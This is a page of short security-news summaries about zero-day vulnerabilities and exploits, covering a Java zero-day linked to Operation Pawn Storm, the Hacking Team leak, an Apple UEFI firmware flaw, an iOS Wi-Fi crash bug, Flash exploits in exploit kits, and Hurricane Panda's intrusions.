Trend Micro has issued predictable-but-sensible advice that Java should be switched off, because there's a zero-day being exploited in the wild. Researchers said the exploit will hose systems running the latest Java platform. Because there's no patch, they added users should disable the code.
The attackers have been linked to Operation Pawn Storm, which targeted the likes of the North Atlantic Treaty Organisation and the White House. The attackers' tactics, techniques, and procedures suggest the exploit was used by the same actors behind 2014 attacks on the White House and NATO among others under the campaign dubbed Operation Pawn Storm.Read more
Spyware company Hacking Team was compromised earlier this week, leading to 400GB of internal and files, source code, and emails being made available on torrent sites for anyone to download.
While there’s some embarrassing communications contained within the leak, some serious software flaws have also been discovered. Some source code contained within the leak includes software vulnerabilities that are being exploited by Hacking Team to break into PCs. Two unpatched vulnerabilities have been discovered, affecting Adobe’s Flash software and Microsoft’s Windows operating system.Read more
A zero-day software vulnerability in the firmware of older Apple computers could be used to slip hard-to-remove malware onto a computer. Pedro Vilaca wrote that the flaw he found builds on previous ones but this one could be far more dangerous.
Vilaca found it was possible to tamper with an Apple computer's UEFI, a firmware designed to improve upon BIOS, which is low-level code that bridges a computer's hardware and operating system at startup. The UEFI code is typically sealed off from users. But Vilaca wrote that he found the code is unlocked after a computer goes to sleep and reawakens, allowing it to be modified.Read more
Researchers have revealed a zero-day vulnerability in iOS 8 that, when exploited by a malicious wireless hotspot, will repeatedly crash nearby Apple iPhones, iPads and iPods. The attack will render vulnerable iOS things within range unstable or even entirely unusable by triggering constant reboots.
Anyone can take any router and create a Wi-Fi hotspot that forces you to connect to their network, and then manipulate the traffic to cause apps and the operating system to crash. This is not a denial-of-service where you can't use your Wi-Fi – this is a denial-of-service so you can't use your device even in offline mode.Read more
Zero day actually refers to two things — a zero-day vulnerability or a zero-day exploit. Zero-day vulnerability refers to a security hole in software — such as browser software or operating system software — that is yet unknown to the software maker or to antivirus vendors.
This means the vulnerability is also not yet publicly known, though it may already be known by attackers who are quietly exploiting it. Because zero day vulnerabilities are unknown to software vendors and to antivirus firms, there is no patch available yet to fix the hole and generally no antivirus signatures to detect the exploit, though sometimes antivirus scanners can still detect a zero day using heuristics.Read more
Two exploit kits have been outfitted with the exploit for a Flash Player vulnerability that has been patched only a week ago, the researcher that goes by the handle Kafeine has shared on Tuesday. The integer overflow vulnerability in question can allow attackers to execute arbitrary code via unspecified vectors, and is deemed critical.
Initial information about it has been shared with Adobe via HP's Zero Day Initiative. Researchers are admittedly worried about the short period of time that passed between is patching and the exploit surfacing in the Fiesta and Angler exploit kits. As Kafeine notes, it's technically possible that the exploit was included in the kits even before the patch was available.Read more
A highly advanced adversary dubbed Hurricane Panda is targeting major infrastructure companies with a zero-day exploit—and it has been since last spring. The timestamp of the attack suggests that the vulnerability has been actively exploited in the wild for at least five months.
CrowdStrike first detected suspicious activity on a 64-bit Windows Server 2008 R2 machine that was attributed to a compromise by the group. It uncovered that the attacks begin with compromising web servers and deploying Chopper webshells, and then escalating privileges using the newly discovered Local Privilege Escalation tool, which exploits a previously unknown vulnerability.Read more
110 Reykjavik, Iceland